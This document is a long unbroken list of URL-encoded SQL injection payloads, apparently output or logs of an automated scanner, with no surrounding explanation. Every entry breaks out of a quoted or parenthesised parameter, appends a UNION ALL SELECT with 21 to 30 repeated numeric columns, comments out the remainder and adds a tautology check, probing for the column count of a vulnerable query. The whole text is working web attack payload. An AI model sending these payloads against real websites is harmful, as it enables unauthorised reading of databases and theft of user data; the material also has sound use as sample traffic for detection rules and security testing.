-4339%27%20UNION%20ALL%20SELECT%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%2C%208951%23%20AND%20%27OfUL%27%3D%27OfUL -7777%27%20UNION%20ALL%20SELECT%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%2C%202375%23%20AND%20%27MZDE%27%3D%27MZDE -3758%27%20UNION%20ALL%20SELECT%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%2C%205311%23%20AND%20%27cLgy%27%3D%27cLgy -5441%27%20UNION%20ALL%20SELECT%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%23%20AND%20%27ubmn%27%3D%27ubmn -7408%27%20UNION%20ALL%20SELECT%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%23%20AND%20%27zSuq%27%3D%27zSuq -2304%27%20UNION%20ALL%20SELECT%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%2C%202449%23%20AND%20%27JKOg%27%3D%27JKOg -4005%27%20UNION%20ALL%20SELECT%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%23%20AND%20%27qnkP%27%3D%27qnkP -3219%27%20UNION%20ALL%20SELECT%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%23%20AND%20%27bGeu%27%3D%27bGeu -2031%27%20UNION%20ALL%20SELECT%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%2C%205723%23%20AND%20%27bUJU%27%3D%27bUJU -4639%27%29%20UNION%20ALL%20SELECT%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%2C%201927%23%20AND%20%28%27Krgf%27%20LIKE%20%27Krgf -3621%27%29%20UNION%20ALL%20SELECT%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%2C%201473%23%20AND%20%28%27IRwj%27%20LIKE%20%27IRwj -2133%27%29%20UNION%20ALL%20SELECT%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%2C%201866%23%20AND%20%28%27pBca%27%20LIKE%20%27pBca -1444%27%29%20UNION%20ALL%20SELECT%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%2C%209192%23%20AND%20%28%27ZgDl%27%20LIKE%20%27ZgDl -9967%27%29%20UNION%20ALL%20SELECT%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%2C%206107%23%20AND%20%28%27XprZ%27%20LIKE%20%27XprZ -7857%27%29%20UNION%20ALL%20SELECT%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%2C%208081%23%20AND%20%28%27HUhS%27%20LIKE%20%27HUhS -9218%27%29%20UNION%20ALL%20SELECT%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%23%20AND%20%28%27HPVy%27%20LIKE%20%27HPVy -8159%27%29%20UNION%20ALL%20SELECT%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%23%20AND%20%28%27fJxh%27%20LIKE%20%27fJxh -4913%27%29%20UNION%20ALL%20SELECT%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%23%20AND%20%28%27dvFP%27%20LIKE%20%27dvFP -6723%27%29%20UNION%20ALL%20SELECT%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%23%20AND%20%28%27XnUp%27%20LIKE%20%27XnUp -8600%27%29%29%20UNION%20ALL%20SELECT%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%23%20AND%20%28%28%27NOoT%27%20LIKE%20%27NOoT -9719%27%29%29%20UNION%20ALL%20SELECT%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%23%20AND%20%28%28%27yOMU%27%20LIKE%20%27yOMU -9041%27%29%29%20UNION%20ALL%20SELECT%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%23%20AND%20%28%28%27IWcH%27%20LIKE%20%27IWcH -3399%27%29%29%20UNION%20ALL%20SELECT%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%23%20AND%20%28%28%27bGQU%27%20LIKE%20%27bGQU -5423%27%29%29%20UNION%20ALL%20SELECT%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%23%20AND%20%28%28%27IRSE%27%20LIKE%20%27IRSE -9598%27%29%29%20UNION%20ALL%20SELECT%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%2C%209148%23%20AND%20%28%28%27DzyK%27%20LIKE%20%27DzyK -1081%27%29%29%20UNION%20ALL%20SELECT%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%2C%202755%23%20AND%20%28%28%27Pcsx%27%20LIKE%20%27Pcsx -5353%27%29%29%20UNION%20ALL%20SELECT%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%2C%205906%23%20AND%20%28%28%27JMlY%27%20LIKE%20%27JMlY -6762%27%29%29%20UNION%20ALL%20SELECT%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%23%20AND%20%28%28%27dAPl%27%20LIKE%20%27dAPl -4899%27%29%29%20UNION%20ALL%20SELECT%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%2C%209842%23%20AND%20%28%28%27GStl%27%20LIKE%20%27GStl -4914%27%29%29%29%20UNION%20ALL%20SELECT%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%23%20AND%20%28%28%28%27RPJN%27%20LIKE%20%27RPJN -8275%27%29%29%29%20UNION%20ALL%20SELECT%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%2C%201224%23%20AND%20%28%28%28%27pycG%27%20LIKE%20%27pycG -1688%27%29%29%29%20UNION%20ALL%20SELECT%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%2C%202631%23%20AND%20%28%28%28%27bJmO%27%20LIKE%20%27bJmO -2099%27%29%29%29%20UNION%20ALL%20SELECT%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%23%20AND%20%28%28%28%27Gfrd%27%20LIKE%20%27Gfrd -6796%27%29%29%29%20UNION%20ALL%20SELECT%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%23%20AND%20%28%28%28%27MRbf%27%20LIKE%20%27MRbf -5245%27%29%29%29%20UNION%20ALL%20SELECT%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%23%20AND%20%28%28%28%27Suak%27%20LIKE%20%27Suak -3080%27%29%29%29%20UNION%20ALL%20SELECT%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%23%20AND%20%28%28%28%27tjEF%27%20LIKE%20%27tjEF -7790%27%29%29%29%20UNION%20ALL%20SELECT%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%23%20AND%20%28%28%28%27ffcH%27%20LIKE%20%27ffcH -2112%27%29%29%29%20UNION%20ALL%20SELECT%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%23%20AND%20%28%28%28%27WtYJ%27%20LIKE%20%27WtYJ -3214%27%29%29%29%20UNION%20ALL%20SELECT%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%23%20AND%20%28%28%28%27pHAG%27%20LIKE%20%27pHAG -1213%27%20UNION%20ALL%20SELECT%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%23%20AND%20%27ndtr%27%20LIKE%20%27ndtr -7367%27%20UNION%20ALL%20SELECT%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%2C%208489%23%20AND%20%27FaCZ%27%20LIKE%20%27FaCZ -2758%27%20UNION%20ALL%20SELECT%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%2C%204650%23%20AND%20%27gDsK%27%20LIKE%20%27gDsK -3674%27%20UNION%20ALL%20SELECT%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%2C%206203%23%20AND%20%27wAgS%27%20LIKE%20%27wAgS -6095%27%20UNION%20ALL%20SELECT%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%23%20AND%20%27DPAl%27%20LIKE%20%27DPAl -8965%27%20UNION%20ALL%20SELECT%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%2C%206703%23%20AND%20%27IuPQ%27%20LIKE%20%27IuPQ -2413%27%20UNION%20ALL%20SELECT%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%23%20AND%20%27sHye%27%20LIKE%20%27sHye -5745%27%20UNION%20ALL%20SELECT%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%23%20AND%20%27tPrf%27%20LIKE%20%27tPrf -8948%27%20UNION%20ALL%20SELECT%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%2C%203153%23%20AND%20%27tyjU%27%20LIKE%20%27tyjU -1032%27%20UNION%20ALL%20SELECT%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%2C%208986%23%20AND%20%27qqRa%27%20LIKE%20%27qqRa -4447%22%29%20UNION%20ALL%20SELECT%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%23%20AND%20%28%22qBLf%22%3D%22qBLf -9159%22%29%20UNION%20ALL%20SELECT%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%2C%206004%23%20AND%20%28%22FKaI%22%3D%22FKaI -5904%22%29%20UNION%20ALL%20SELECT%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%23%20AND%20%28%22MoXp%22%3D%22MoXp -3952%22%29%20UNION%20ALL%20SELECT%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%2C%204908%23%20AND%20%28%22CYFw%22%3D%22CYFw -4951%22%29%20UNION%20ALL%20SELECT%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%23%20AND%20%28%22OzIS%22%3D%22OzIS -7747%22%29%20UNION%20ALL%20SELECT%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%23%20AND%20%28%22yoDF%22%3D%22yoDF -5989%22%29%20UNION%20ALL%20SELECT%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%23%20AND%20%28%22ZXtT%22%3D%22ZXtT -2686%22%29%20UNION%20ALL%20SELECT%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%23%20AND%20%28%22HMcB%22%3D%22HMcB -9346%22%29%20UNION%20ALL%20SELECT%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%23%20AND%20%28%22uNFo%22%3D%22uNFo -7678%22%29%20UNION%20ALL%20SELECT%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%23%20AND%20%28%22ljuV%22%3D%22ljuV -6043%22%29%29%20UNION%20ALL%20SELECT%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%2C%201279%23%20AND%20%28%28%22Rasm%22%3D%22Rasm -9689%22%29%29%20UNION%20ALL%20SELECT%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%23%20AND%20%28%28%22BUDD%22%3D%22BUDD -2795%22%29%29%20UNION%20ALL%20SELECT%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%2C%207159%23%20AND%20%28%28%22QTVI%22%3D%22QTVI -7598%22%29%29%20UNION%20ALL%20SELECT%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%2C%209252%23%20AND%20%28%28%22UZBa%22%3D%22UZBa -9748%22%29%29%20UNION%20ALL%20SELECT%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%23%20AND%20%28%28%22iiru%22%3D%22iiru -9209%22%29%29%20UNION%20ALL%20SELECT%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%23%20AND%20%28%28%22Gaiw%22%3D%22Gaiw -3402%22%29%29%20UNION%20ALL%20SELECT%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%23%20AND%20%28%28%22TmiI%22%3D%22TmiI -2653%22%29%29%20UNION%20ALL%20SELECT%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%2C%205009%23%20AND%20%28%28%22vuBA%22%3D%22vuBA -9393%22%29%29%20UNION%20ALL%20SELECT%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%23%20AND%20%28%28%22QHaE%22%3D%22QHaE -3135%22%29%29%20UNION%20ALL%20SELECT%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%23%20AND%20%28%28%22liQI%22%3D%22liQI -8709%22%29%29%29%20UNION%20ALL%20SELECT%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%2C%202195%23%20AND%20%28%28%28%22ElIf%22%3D%22ElIf -4858%22%29%29%29%20UNION%20ALL%20SELECT%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%23%20AND%20%28%28%28%22RBIm%22%3D%22RBIm -3902%22%29%29%29%20UNION%20ALL%20SELECT%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%2C%205836%23%20AND%20%28%28%28%22nrvc%22%3D%22nrvc -4984%22%29%29%29%20UNION%20ALL%20SELECT%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%2C%209441%23%20AND%20%28%28%28%22jRRb%22%3D%22jRRb 